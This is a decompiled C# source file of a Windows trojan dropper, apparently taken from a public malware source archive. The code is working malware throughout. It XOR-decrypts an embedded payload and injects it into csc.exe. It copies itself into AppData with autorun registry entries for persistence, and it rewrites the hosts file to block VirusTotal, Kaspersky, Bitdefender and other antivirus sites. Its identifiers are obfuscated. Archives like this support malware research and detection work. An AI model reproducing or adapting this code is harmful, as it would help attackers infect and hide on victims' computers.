mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
222 lines
14 KiB
C#
222 lines
14 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp
|
|
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
|
|
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using Microsoft.Win32;
|
|
using System;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
using System.Resources;
|
|
using System.Runtime.InteropServices;
|
|
using System.Text;
|
|
|
|
namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ
|
|
{
|
|
[StandardModule]
|
|
internal sealed class fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp
|
|
{
|
|
private static ResourceManager pPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQ = new ResourceManager("duggsaogahsoghasikgasg", Assembly.GetExecutingAssembly());
|
|
private static string cDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwV = (string) fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.pPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQ.GetObject("picturekashfklhaskgasg");
|
|
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
private static extern void Sleep(long dwMilliseconds);
|
|
|
|
[STAThread]
|
|
public static void Main()
|
|
{
|
|
try
|
|
{
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
byte[] pByteArray = fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.xordecrypt(Convert.FromBase64String(fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.cDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwV), Encoding.Default.GetBytes("freetheweed"));
|
|
try
|
|
{
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
try
|
|
{
|
|
aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.bmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPX(pByteArray, Conversions.ToString(Environment.SystemDirectory[0]) + ":\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe");
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
try
|
|
{
|
|
gZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWa.rofl();
|
|
File.Copy(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, Environment.GetEnvironmentVariable("Appdata") + "\\KqJuyYy.exe");
|
|
NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.KSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfj("BZohRyCWyD", "\"" + Environment.GetEnvironmentVariable("Appdata") + "\\KqJuyYy.exe\"", NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheCurrentoftheUSER);
|
|
File.Copy(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, Environment.GetEnvironmentVariable("Appdata") + "\\KEWTpM.exe");
|
|
NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.KSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfj("nYSZDQPfjm", "\"" + Environment.GetEnvironmentVariable("Appdata") + "\\KEWTpM.exe\"", NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheLocalofMachine);
|
|
HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP.SJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGt();
|
|
object Instance = (object) new StreamWriter(Conversions.ToString(Registry.GetValue("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", "DataBasePath", (object) "oops")) + "\\hosts");
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 www.virustotal.com"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 virustotal.com"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 74.53.201.162"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 www.virscan.org"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 virscan.org"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 61.180.255.138"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 www.virusscan.jotti.org"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 virusscan.jotti.org"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 209.160.72.83"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 www.kaspersky.com"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 kaspersky.com"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 38.117.98.208"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 www.bitdefender.com"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 bitdefender.com"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) "127.0.0.1 66.40.145.200"
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
|
|
{
|
|
(object) Environment.NewLine
|
|
}, (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
NewLateBinding.LateCall(Instance, (Type) null, "Dispose", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
}
|
|
|
|
private static byte[] xordecrypt(byte[] input, byte[] key)
|
|
{
|
|
byte[] numArray1 = Convert.FromBase64String(Encoding.Default.GetString(input));
|
|
byte[] numArray2 = new byte[checked (numArray1.Length - 2 + 1)];
|
|
byte num1 = numArray1[checked (numArray1.Length - 1)];
|
|
int num2 = checked (numArray2.Length - 1);
|
|
int index = 0;
|
|
while (index <= num2)
|
|
{
|
|
numArray2[index] = checked ((byte) ((int) numArray1[index] ^ unchecked ((int) (byte) ((uint) key[index % key.Length] << (checked (index + (int) num1 + key.Length) & 7)) % 256)));
|
|
checked { ++index; }
|
|
}
|
|
return numArray2;
|
|
}
|
|
|
|
public static string ReverseString(string Value)
|
|
{
|
|
StringBuilder stringBuilder = new StringBuilder();
|
|
int index = checked (Value.Length - 1);
|
|
while (index >= 0)
|
|
{
|
|
stringBuilder.Append(Value[index]);
|
|
checked { index += -1; }
|
|
}
|
|
return stringBuilder.ToString();
|
|
}
|
|
}
|
|
}
|